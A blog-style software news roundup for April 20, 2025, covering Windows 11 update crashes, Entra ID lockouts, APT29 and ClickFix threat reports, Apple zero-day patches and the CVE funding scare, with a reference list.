Software Industry News Bulletin: April 20, 2025 - Stability Issues, Security Threats, and Updates
Software Industry News Bulletin
Table of Contents
Introduction
April 20, 2025, marked a day of significant developments within the software industry, heavily influenced by stability concerns surrounding Microsoft's key platforms. Reports surfaced of disruptive "Blue Screen of Death" (BSOD) errors affecting Windows 11 users following recent updates. Simultaneously, a problematic rollout of a new Microsoft Entra ID security feature led to widespread account lockouts for many organizations (BleepingComputer, 2025a). The cybersecurity front saw continued evolution, with state-sponsored actors reportedly adopting sophisticated social engineering tactics, alongside emerging phishing and mobile malware threats (The Hacker News, 2025a; BleepingComputer, 2025a). These events occurred shortly after critical security patches were released by Apple (Fingerlakes1.com, 2025) and amidst ongoing discussions about the funding stability of vital cybersecurity resources like the CVE program (Industrial Cyber, 2025). Routine updates from companies like Xiaomi, AMD, and Nippon Ichi Software also punctuated the day, highlighting continued innovation in mobile, hardware, and gaming sectors (XiaomiTime, 2025; GameGPU, 2025; Gematsu, 2025a). This post summarizes the key software news from April 20, 2025, based on available reports.
Section 1: Microsoft Platform Stability Under Scrutiny
The reliability of Microsoft's flagship operating system and identity management services faced significant questions on April 20th, as multiple issues stemming from recent software updates came to light, impacting users and administrators.
Subsection 1.1: Windows 11 Updates Trigger Blue Screen Crashes
Technology news outlets confirmed reports around April 20th of users experiencing BSOD system crashes on machines running Windows 11 version 24H2 (Techzine Europe, 2025; BleepingComputer, 2025b). The instability was linked to two recent Windows updates: the April 2025 cumulative security update KB5055523 (released April 8th) and the March 2025 preview update KB5053656 (BornCity, 2025; The Register, 2025a).
User reports indicated crashes typically occurred after restarting the system following update installation. The blue screen displayed the error code 0x18B, indicating a SECURE_KERNEL_ERROR, which suggests a problem within the core protected components of the operating system (Techzine Europe, 2025). While reports became widespread around April 20th, some evidence suggests instability may have started appearing shortly after the initial release of the updates (Microsoft Community, 2025).
Microsoft acknowledged the issue and updated support documentation for the affected updates (BleepingComputer, 2025b). As an immediate fix, the company initiated a Known Issue Rollback (KIR). This KIR mechanism allows Microsoft to remotely disable or revert the specific problematic change without requiring user action on consumer devices and unmanaged business PCs, typically propagating within 24 hours (BleepingComputer, 2025b). However, enterprise environments required manual intervention by IT administrators, who needed to download and deploy a specific Group Policy object using tools like the Group Policy Editor (BleepingComputer, 2025b). Microsoft stated that a permanent fix for the SECURE_KERNEL_ERROR would be included in a future update (TechPowerUp, 2025).
The emergence of a critical BSOD error linked to both a preview and a cumulative security update for the latest Windows 11 version (24H2) raises concerns about Microsoft's update validation process. The reliance on the reactive KIR mechanism suggests a significant issue bypassed pre-release testing, potentially indicating vulnerabilities in the quality control pipeline for Windows 11 24H2 updates.
Subsection 1.2: Widespread Microsoft Entra ID Lockouts Linked to MACE Feature Rollout
Simultaneously, numerous organizations reported widespread user account lockouts in Microsoft Entra ID (formerly Azure Active Directory) starting around April 19th and continuing into April 20th (BleepingComputer, 2025a; BleepingComputer, 2025c). Administrators observed a sudden increase in alerts claiming user credentials were "leaked," leading to automatic account lockouts (Derdecker, 2025; Reddit, 2025).
Crucially, many administrators believed these alerts were false positives. Affected accounts often had unique, strong passwords, were protected by multi-factor authentication (MFA), and checks against breach notification services like Have I Been Pwned (HIBP) showed no evidence of compromise (Reddit, 2025). One managed detection and response provider reported over 20,000 such notifications overnight across its clients (BleepingComputer, 2025c).
Investigations pointed to the rollout of a new Microsoft Entra ID Enterprise application called "MACE Credential Revocation" as the root cause. This feature is designed to automatically lock accounts with potentially compromised credentials. However, its recent deployment, described by some as a "ninja rollout" due to lack of prior notice, appeared to generate numerous false positives (BleepingComputer, 2025c). Some administrators encountered error code 53003 related to conditional access policies during the lockouts (BleepingComputer, 2025c). As of April 20th, Microsoft was reportedly investigating and assisting affected organizations, but no broad public statement or universal resolution had been issued (BleepingComputer, 2025c).
This incident highlights the operational disruption possible when new security features in critical systems like identity management are rolled out without sufficient testing or clear communication, leading to legitimate users being locked out and requiring reactive support.
Subsection 1.3: Windows Hello Authentication Failures Emerge
Adding to the update issues, reports on April 20th indicated that the same April 2025 security update, KB5055523, was causing failures with Windows Hello authentication (facial recognition, PIN logins) on systems running Windows 11 24H2 and Windows Server 2025 (BleepingComputer, 2025d).
The problem seemed specific to devices with advanced security features like Dynamic Root of Trust for Measurement (DRTM) or System Guard Secure Launch enabled before the update. The failure often occurred after users performed a "Reset this PC" operation while choosing to keep personal files (BleepingComputer, 2025d). Affected users saw messages like "Something happened and your PIN isn't available" or "Sorry something went wrong with face setup" (BleepingComputer, 2025d). Microsoft acknowledged this "edge case" and provided workarounds involving re-enrolling Windows Hello credentials, but a definitive fix was not available as of April 20th (BleepingComputer, 2025d).
The fact that a single update (KB5055523) is linked to multiple distinct issues—Kerberos authentication problems (Microsoft Learn, 2025), potential BSODs (BleepingComputer, 2025b), and Windows Hello failures (BleepingComputer, 2025d)—underscores the complexity of modern OS updates and potential interactions between code, hardware, and security configurations.
Section 2: Cybersecurity Landscape: Sophisticated Threats and Vulnerabilities
The cybersecurity threat landscape on April 20th was characterized by reports of advanced persistent threat (APT) groups adopting new tactics, innovative phishing schemes, and the discovery of new mobile malware, all occurring shortly after significant zero-day patches were issued by major vendors.
Subsection 2.1: State-Sponsored Actors Escalate Tactics
A notable report detailed activities of the Russian state-sponsored threat actor APT29 (also known as Nobelium or Cozy Bear). Researchers linked the group to a sophisticated phishing campaign targeting diplomatic organizations in Europe (The Hacker News, 2025a). This campaign utilized a new variant of the WINELOADER malware backdoor and a previously undocumented malware loader named GRAPELOADER (The Hacker News, 2025a). GRAPELOADER acts as an initial tool for system fingerprinting, establishing persistence, and delivering the main payload. Analysis indicated GRAPELOADER employs more advanced anti-analysis and obfuscation techniques than APT29's previous tools, signaling an evolution in their capabilities (The Hacker News, 2025a).
Furthermore, a broader trend reported on April 20th involved multiple state-sponsored hacking groups (attributed to North Korea, Iran, and Russia) adopting the "ClickFix" social engineering tactic (The Hacker News, 2025b; Jacobson CPSC, 2024). ClickFix deceives users into executing malicious code (often PowerShell scripts) by presenting fake error messages or instructions that guide them to copy and paste commands, bypassing technical security controls (The Hacker News, 2025b; Field Effect, 2025; Group-IB, 2025). Examples included North Korea's Kimsuky group using ClickFix to deploy the Quasar RAT via fake meeting requests, and Iran-linked TA450 using lures to trick users into installing RMM software (The Hacker News, 2025b).
Originally popularized by cybercrime groups like TA571 or with malware like ClearFake (Proofpoint US, 2025), the adoption of ClickFix by nation-state actors signifies a convergence of tactics, leveraging user manipulation techniques honed by financially motivated criminals to achieve espionage goals (Logpoint, 2025; Sekoia.io Blog, 2025a; Sekoia.io Blog, 2025b; McAfee Blog, 2025; HHS.gov, 2025).
Subsection 2.2: Phishing and Malware Innovations
Other threats reported included a novel phishing attack abusing Google's OAuth authentication mechanism (BleepingComputer, 2025a). Attackers reportedly found a method, possibly involving DKIM replay attacks, to send fraudulent emails that appeared legitimately signed by Google, bypassing standard checks and increasing the likelihood of users clicking malicious links (BleepingComputer, 2025a).
In the mobile realm, a new Android malware-as-a-service (MaaS) platform named 'SuperCard X' was identified (BleepingComputer, 2025a). This malware targets Android devices to steal payment card information, primarily by facilitating Near Field Communication (NFC) relay attacks. This allows attackers to use stolen card data for fraudulent transactions at physical POS terminals or ATMs by relaying the NFC communication from the victim's phone (BleepingComputer, 2025a).
These attacks highlight attackers' focus on undermining systems and protocols users trust—exploiting confidence in Google's authentication and the assumed security of NFC mobile payments.
Subsection 2.3: Security Patching Context (Prior Day)
Crucial context for the April 20th events came from Apple, which had released an emergency security update (iOS 18.4.1) on April 19th (Fingerlakes1.com, 2025; Economic Times, 2025). This update addressed two critical zero-day vulnerabilities actively exploited in targeted attacks:
- CVE-2025-31200: A vulnerability in CoreAudio potentially allowing remote code execution via a maliciously crafted audio file (Fingerlakes1.com, 2025).
- CVE-2025-31201: A flaw in Apple's Remote Participant Audio Control (RPAC) allowing an attacker with device access to bypass Pointer Authentication Code (PAC) memory protections (Fingerlakes1.com, 2025).
The existence and active exploitation of these zero-days in a major mobile platform immediately preceding April 20th underscore the persistent and evolving threat landscape and the capability of sophisticated actors to discover and weaponize previously unknown vulnerabilities.
Table: Key Security Incidents/Vulnerabilities Reported Around April 20, 2025
| Event/Threat Type | Details | Reported On/Context Date | Source(s) |
|---|---|---|---|
| Microsoft Windows BSOD | KB5055523/KB5053656 causing 0x18B error on Win11 24H2; KIR deployed | April 20, 2025 | (BleepingComputer, 2025a; Microsoft Learn, 2025) |
| Microsoft Entra ID Lockouts | Widespread lockouts due to MACE feature rollout (false positives) | April 19/20, 2025 | (BleepingComputer, 2025a) |
| Microsoft Windows Hello Issue | KB5055523 breaks Hello login (Face/PIN) post-reset w/ DRTM/SysGuard | April 20, 2025 | (BleepingComputer, 2025d) |
| APT29 Phishing Campaign | Targeting EU diplomats; WINELOADER/GRAPELOADER malware | April 20, 2025 | (The Hacker News, 2025a) |
| "ClickFix" Tactic Adoption | State-sponsored actors (NK, Iran, Russia) using social engineering | April 20, 2025 | (BleepingComputer, 2025a; Jacobson CPSC, 2024) |
| Google OAuth Phishing | Abuse via DKIM replay attack | April 20, 2025 | (BleepingComputer, 2025a) |
| Android NFC Relay Malware | 'SuperCard X' MaaS platform reported | April 20, 2025 | (BleepingComputer, 2025a) |
| Apple Zero-Days (Context) | CVE-2025-31200, CVE-2025-31201 fixed in iOS 18.4.1 (actively exploited) | April 19, 2025 | (Fingerlakes1.com, 2025) |
Section 3: Software Updates and Industry Announcements
Amidst the security and stability concerns, routine software development and industry announcements continued on April 20th.
Subsection 3.1: Mobile OS Enhancements
Xiaomi announced or detailed important bug fixes for its Android-based HyperOS through an April 2025 update, with reports circulating on April 20th (XiaomiTime, 2025). This update specifically targeted issues reported by users following the global rollout of the operating system. Key fixes included resolving inconsistent media volume control and sudden volume adjustments experienced on Redmi Note 14 devices, and addressing a black screen issue encountered when connecting Redmi Note 14 Pro 5G phones to Android Auto infotainment systems. The update also aimed to fix notification delays on devices in the POCO series and incorporated general system stability improvements and optimizations, such as battery life enhancements for the Xiaomi 14 Ultra (XiaomiTime, 2025).
Subsection 3.2: Hardware and Gaming Software Developments
In the hardware sector, news emerged on April 20th that Advanced Micro Devices (AMD) is preparing to launch a new professional graphics card, tentatively identified as the Radeon PRO W9090 (GameGPU, 2025). This upcoming product is reportedly based on AMD's Navi 48 graphics processing unit (GPU), part of the RDNA 4 architecture, and is expected to feature a substantial 32 GB of memory (GameGPU, 2025). This move signals AMD's intent to compete strongly in the high-performance professional workstation market, targeting demanding applications in fields like artificial intelligence, content creation, engineering simulation, and scientific computing. While the official name and release date were not confirmed, speculation suggests an announcement could occur at a future AMD event focused on the professional sector, such as its "Advancing AI" series (GameGPU, 2025).
On the gaming software front, Japanese developer Nippon Ichi Software made announcements regarding its upcoming projects (Gematsu, 2025a). The company revealed five new titles were in development, including an action role-playing game (RPG) currently known by the project name "Kyouran," planned for release on PlayStation 5 and Nintendo Switch consoles in 2026 (Gematsu, 2025a). Additionally, a live stream event titled "Super Robot Wars Series News Station" was scheduled for April 20, 2025, indicating further news related to their popular strategy RPG franchise (Gematsu, 2025b).
These developments from Xiaomi, AMD, and Nippon Ichi Software, while distinct, collectively illustrate the ongoing activity in specialized market segments. AMD's focus is on the high-end professional GPU space driven by performance demands. Nippon Ichi caters to specific gaming niches. Xiaomi's HyperOS update responds directly to user-reported bugs on specific device models. This contrasts with the broad, platform-level stability issues reported for Microsoft, demonstrating that targeted development and refinement continue actively in parallel within various hardware and software niches, often driven by specific performance requirements, entertainment demands, or direct user feedback cycles.
Section 4: Cybersecurity Infrastructure: Recent Developments
While no new funding decisions were made on April 20th itself, the recent near-crisis surrounding the funding for the Common Vulnerabilities and Exposures (CVE) program likely remained a topic of discussion and concern within the cybersecurity community (Security This Week, 2025). The contract under which the non-profit MITRE Corporation operates the CVE program, with funding from the U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), was set to expire on April 16, 2025 (Industrial Cyber, 2025; SecurityWeek, 2025; BleepingComputer, 2025e; The Hacker News, 2025c; The Register, 2025b).
This impending expiration triggered widespread alarm across the global cybersecurity industry just days before April 20th (Industrial Cyber, 2025; SecurityWeek, 2025; BleepingComputer, 2025e; The Hacker News, 2025c; The Register, 2025b). The CVE program provides the standardized identifiers (CVE IDs) used globally to track publicly disclosed software vulnerabilities, forming a foundational element for vulnerability management, security advisories, threat intelligence, and incident response (SecurityWeek, 2025). Concerns about a funding lapse included the potential inability of CVE Numbering Authorities (CNAs) to reserve and assign new CVE IDs, the possible deterioration or shutdown of the central CVE database and website, and the cascading negative impacts on security tools, vendor patching processes, and overall cyber defense coordination (Industrial Cyber, 2025; BleepingComputer, 2025e).
Fortunately, CISA secured and executed an 11-month funding extension late on April 16th or early April 17th, ensuring the program's continuity for the near term and averting an immediate crisis (SecurityWeek, 2025; Tenable, 2025; Cybernews, 2025). Concurrently, the formation of a new non-profit entity, The CVE Foundation, was announced, potentially offering a path towards more stable, long-term governance and funding independent of annual government contracting cycles (Krebs on Security, 2025). This entire episode unfolded while the National Institute of Standards and Technology (NIST) continues to face challenges processing a significant backlog of submitted CVEs for enrichment in its National Vulnerability Database (NVD), further highlighting the strains on the existing vulnerability management infrastructure (SecurityWeek, 2025).
The CVE funding scare, though resolved shortly before April 20th, served as a potent reminder of the cybersecurity ecosystem's reliance on critical, foundational programs that can be vulnerable to funding uncertainties or single points of failure. The rapid mobilization of the community—evidenced by efforts like VulnCheck proactively reserving CVE IDs (BleepingComputer, 2025e; Cybernews, 2025), calls for archiving the database (Krebs on Security, 2025), and the swift establishment of The CVE Foundation (Krebs on Security, 2025)—demonstrates both the perceived criticality of the CVE program and burgeoning efforts to build more resilient, perhaps more distributed or independently sustained, vulnerability information infrastructures. The recent launch of a European vulnerability database (EUVD) by ENISA also points towards diversification in this space. These discussions around the stability and future governance of essential cybersecurity infrastructure were undoubtedly still relevant context for the industry on April 20th.
Section 5: Other Developments
Beyond the major platform stability issues and cybersecurity threats, other minor activities and notable absences shaped the software news landscape on April 20, 2025.
Activity was noted within niche online communities, such as new posts appearing on the Amiga.org forum specifically dated April 20, 2025, indicating continued engagement within retro-computing and hobbyist software circles (Amiga.org, 2025).
However, based on the information available for April 20th, there was a lack of major new security advisories issued by key agencies like CISA (CISA, 2025). Similarly, prominent vulnerability databases such as Zero-Day.cz did not appear to list significant new entries specifically disclosed or updated on this date (Zero-Day.cz, 2025).
Furthermore, the provided materials did not contain reports of major software company mergers, acquisitions, significant partnership announcements, quarterly earnings releases, major strategic shifts, or high-level leadership changes specifically announced or taking effect on April 20, 2025. While there was information regarding ongoing Department of Defense software acquisition policy reforms, these directives originated in March 2025 (DefenseScoop, 2025a; DAU, 2025; AFCEA International, 2025; DefenseScoop, 2025b; HS Today, 2025). Other snippets discussing company earnings or M&A provided general context or related to older events (ReviewJournal.com, 2025; Bowery Capital, 2025; Springfield Business Journal, 2025; American Century Investments, 2025; TradeStation, 2024; Futunn, 2025; Investing.com, 2025; Lexmark Newsroom, 2025; Bureau of Economic Analysis, 2025).
Conclusion
April 20, 2025, was largely defined by significant stability issues impacting Microsoft's Windows 11 and Entra ID platforms. Multiple recent updates triggered blue screen crashes and authentication failures for Windows users, while a flawed rollout of a new security feature caused widespread, erroneous account lockouts in Entra ID, necessitating rollbacks and reactive support measures. These incidents highlight the persistent tension between deploying updates and new features rapidly and ensuring platform stability and reliability in complex software ecosystems.
Concurrently, the cybersecurity landscape showcased the increasing sophistication of threats. Reports detailed Russian state-sponsored group APT29's advanced phishing techniques and, more broadly, the concerning trend of nation-state actors from North Korea, Iran, and Russia adopting deceptive "ClickFix" social engineering tactics pioneered by cybercriminals. Novel attacks exploiting trust in Google's authentication systems and Android's NFC payment capabilities were also reported. These developments occurred against the backdrop of recent emergency zero-day patches from Apple and the narrowly averted funding crisis for the critical CVE vulnerability database, underscoring the dynamic and fragile nature of both cyber threats and the infrastructure used to combat them. Routine updates and announcements from Xiaomi, AMD, and Nippon Ichi Software indicated continued progress in specialized areas like mobile OS refinement, professional hardware, and gaming software, proceeding alongside the broader platform challenges. Overall, April 20th underscored the ongoing, complex interplay between software evolution, operational stability, and the ever-present cybersecurity risks.
References
AFCEA International. (2025). DoD reaffirms software acquisition pathway use. AFCEA Signal Media. https://www.afcea.org/signal-media/defense-operations/dod-reaffirms-software-acquisition-pathway-use
Amiga.org. (2025). Index. Amiga.org. https://forum.amiga.org/
American Century Investments. (2025). International Growth Fund. American Century Investments. https://res.americancentury.com/docs/IntlGrowth_Commentary.pdf
BleepingComputer. (2025a, April 20). Cybersecurity, technology news and support. BleepingComputer. https://www.bleepingcomputer.com/
BleepingComputer. (2025b, April 20). Microsoft warns of blue screen crashes caused by April updates. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-blue-screen-crashes-caused-by-april-updates/
BleepingComputer. (2025c, April 20). Widespread Microsoft Entra lockouts tied to new security feature rollout. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/widespread-microsoft-entra-lockouts-tied-to-new-security-feature-rollout/
BleepingComputer. (2025d, April 20). Microsoft: April 2025 updates break Windows Hello on some PCs. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2025-updates-break-windows-hello-on-some-pcs/
BleepingComputer. (2025e, April 16). MITRE warns that funding for critical CVE program expires today. BleepingComputer. https://www.bleepingcomputer.com/news/security/mitre-warns-that-funding-for-critical-cve-program-expires-today/
BornCity. (2025, April 17). Windows 11 24H2: Update KB5055523 (April 8, 2025) may triggers a Blue Screen. Borncity. https://borncity.com/win/2025/04/17/windows-11-24h2-update-kb5055523-april-8-2025-may-triggers-a-blue-screen/
Bowery Capital. (2025). SaaS Perspectives: Jared Sleeper (Avenir). Bowery Capital Blog. https://bowerycap.com/blog/insights/saas-perspectives-jared-sleeper-avenir
Bureau of Economic Analysis. (2025). MP-5: Government Transactions. Bureau of Economic Analysis. https://www.bea.gov/sites/default/files/methodologies/mp5.pdf
CISA. (2025). Cybersecurity Alerts & Advisories. Cybersecurity and Infrastructure Security Agency. https://www.cisa.gov/news-events/cybersecurity-advisories
Cybernews. (2025, April 17). CVE database funding extended through 2026 – was the panic all for nothing?. Cybernews. https://cybernews.com/security/cve-database-funding-extended-cisa-mitre-corp/
DAU. (2025, March). DoD's Software Acquisition Pathway. Defense Acquisition University. https://www.dau.edu/sites/default/files/2025-03/LTA%20Software%20Acquisition%20Take%204%20Brady.pdf
DefenseScoop. (2025a, March 7). Hegseth issues edict on DOD software acquisition. DefenseScoop. https://defensescoop.com/2025/03/07/hegseth-memo-dod-software-acquisition-pathway-cso-ota/
DefenseScoop. (2025b, March 11). Pentagon gearing up to train personnel on new 'default' software buying approach. DefenseScoop. https://defensescoop.com/2025/03/11/dod-software-acquisition-pathway-training-email-hegseth/
Derdecker. (2025, April 19). Entra User at High Risk – leaked credentials. Cloud und mehr. https://www.derdecker.at/2025/04/19/entra-user-at-high-risk-leaked-credentials/
Economic Times. (2025, April 20). Apple iPhones get urgent iOS 18.4.1 update to fix actively exploited security bugs. The Economic Times. https://m.economictimes.com/news/international/us/apple-iphones-get-urgent-ios-18-4-1-update-to-fix-actively-exploited-security-bugs/articleshow/120412729.cms
Field Effect. (2025, April 18). ClickFix: The rising threat of social engineering through fake fixes. Field Effect Blog. https://fieldeffect.com/blog/clickfix-rising-threat-fake-fixes
Fingerlakes1.com. (2025, April 19). iOS 18.4.1 Emergency Update Fixes Two Major iPhone Security Flaws. Fingerlakes1.com. https://www.fingerlakes1.com/2025/04/19/ios-18-4-1-update-security-patch-zero-day-flaws-explained/
Futunn. (2025). Being included in the S&P 500 is not a dream! Benchmark: New Accounting Standards Will Significantly Boost MicroStrategy (MSTR.US) Earnings. Futu News. https://news.futunn.com/en/post/41589173/being-included-in-the-s-p-500-is-not-a
GameGPU. (2025, April 20). AMD is preparing a professional graphics card Radeon PRO W9090 based on Navi 48 with 32 GB of memory. GameGPU Hardware News. https://en.gamegpu.com/iron/amd-gotovit-professionalnuyu-video-card-radeon-pro-w9090-na-baze-navi-48-s-32-gb-memory
Gematsu. (2025a, April 20). Kyouran (Nippon Ichi Software). Gematsu. https://www.gematsu.com/games/kyouran-nippon-ichi-software
Gematsu. (2025b, April 20). Super Robot Wars Series News Station live stream set for April 20. Gematsu. [URL inferred from context, specific URL for event announcement needed if available]
Group-IB. (2025, April 19). ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims. Group-IB Blog. https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/
HHS.gov. (2025). ClickFix Attacks. U.S. Department of Health & Human Services. https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf
HS Today. (2025, April 17). DOD Looking to Reform Software Acquisition. Homeland Security Today. https://www.hstoday.us/dod-national-defense/dod-looking-to-reform-software-acquisition/
Industrial Cyber. (2025, April 16). MITRE warns of potential cybersecurity disruptions as US government funding for CVE, CWE programs set to expire. Industrial Cyber. https://industrialcyber.co/threat-landscape/mitre-warns-of-potential-cybersecurity-disruptions-as-us-government-funding-for-cve-cwe-programs-set-to-expire/
Investing.com. (2025). Powell speech, ADP & JOLTS, CrowdStrike woe, SBF at NYT – what's moving markets. Investing.com UK. https://uk.investing.com/news/economy/powell-speech-adp--jolts-crowdstrike-woe-sbf-at-nyt--whats-moving-markets-2842800
Jacobson CPSC. (2024, October 23). The ClickFix Social Engineering Tactic. Jacobson CPSC - University of Calgary. https://wpsites.ucalgary.ca/jacobson-cpsc/2024/10/23/the-clickfix-social-engineering-tactic/
Krebs on Security. (2025, April 16). Funding Expires for Key Cyber Vulnerability Database. Krebs on Security. https://krebsonsecurity.com/2025/04/funding-expires-for-key-cyber-vulnerability-database/
Lexmark Newsroom. (2025). News Releases. Lexmark Newsroom. https://newsroom.lexmark.com/newsreleases?l=100&o=200
Logpoint. (2025, April 19). ClickFix: Another Deceptive Social Engineering Technique. Logpoint Blog. https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
McAfee Blog. (2025, April 18). ClickFix Deception: A Social Engineering Tactic to Deploy Malware. McAfee Blog. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
Microsoft Community. (2025, April 14). windows update issues April 14 2025. Microsoft Community. https://answers.microsoft.com/en-us/windows/forum/all/windows-update-issues-april-14-2025/a4178fb7-2ba1-44a3-bba6-6e19ea31dd28
Microsoft Learn. (2025). Windows 11, version 24H2 known issues and notifications. Microsoft Learn. https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-24h2
Proofpoint US. (2025, April 17). ClickFix Malware & Social Engineering Threat Grows. Proofpoint US Blog. https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
Reddit. (2025, April 19). New Entra "Leaked Credentials" - no breach on HIBP etc. r/sysadmin. https://www.reddit.com/r/sysadmin/comments/1k2pmkz/new_entra_leaked_credentials_no_breach_on_hibp_etc/
ReviewJournal.com. (2025). Merger with Las Vegas company to capitalize documentary producer. Las Vegas Review-Journal. https://www.reviewjournal.com/entertainment/merger-with-las-vegas-company-to-capitalize-documentary-producer-2092735/
Security This Week. (2025). Security This Week. Security This Week. https://www.securitythisweek.com/
SecurityWeek. (2025, April 16). MITRE Warns CVE Program Faces Disruption Amid US Funding Uncertainty. SecurityWeek. https://www.securityweek.com/mitre-signals-potential-cve-program-deterioration-as-us-gov-funding-expires/
Sekoia.io Blog. (2025a, April 19). ClickFix tactic: Revenge of detection. Sekoia.io Blog. https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/
Sekoia.io Blog. (2025b, April 19). ClickFix tactic: The Phantom Meet. Sekoia.io Blog. https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
Springfield Business Journal. (2025). Information Technology & Innovation. Springfield Business Journal. https://sbj.net/information-technology/index.html?page_size=20&category_id=170&sub_type=stories%2Cvideos%2Cphotos%2Cspecialsections%2Cprintissues%2Cpackages%2Cmagazines%2Cmaps%2Cfeeds%2Cpolls&list_type=most_commented&page=9
TechPowerUp. (2025, April 18). Windows 11 April Update Triggers BSOD, Breaks Windows Hello. TechPowerUp. https://www.techpowerup.com/335601/windows-11-april-update-triggers-bsod-breaks-windows-hello
Techzine Europe. (2025, April 18). Windows users may experience blue screen crashes after April updates. Techzine Europe. https://www.techzine.eu/news/applications/130617/windows-users-may-experience-blue-screen-crashes-after-april-updates/
Tenable. (2025, April 17). MITRE CVE Program Funding Extended For One Year. Tenable Blog. https://www.tenable.com/blog/mitre-cve-program-funding-set-to-expire
The Hacker News. (2025a, April 20). #1 Trusted Source for Cybersecurity News. The Hacker News. https://thehackernews.com/
The Hacker News. (2025b, April 19). State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns. The Hacker News. https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
The Hacker News. (2025c, April 16). U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert. The Hacker News. https://thehackernews.com/2025/04/us-govt-funding-for-mitres-cve-ends.html
The Register. (2025a, April 16). March, April Windows 11 updates cause BSOD pain for users. The Register. https://www.theregister.com/2025/04/16/microsofts_latest_windows_updates/
The Register. (2025b, April 16). Homeland Security funding for CVE program expires. The Register. https://www.theregister.com/2025/04/16/homeland_security_funding_for_cve/
TradeStation. (2024, July 1). Technology and the Nasdaq Surged Back to Life in July. TradeStation Insights. https://www.tradestation.com/insights/2024/07/01/june-2024-recap/
XiaomiTime. (2025, April 20). Xiaomi releases highly important HyperOS bug fixes – April 2025 Update. XiaomiTime. https://xiaomitime.com/xiaomi-releases-highly-important-hyperos-bug-fixes-april-2025-update-39598/
Zero-Day.cz. (2025). Zero-day Vulnerability Database. Zero-day.cz. https://www.zero-day.cz/database/
Comments
Post a Comment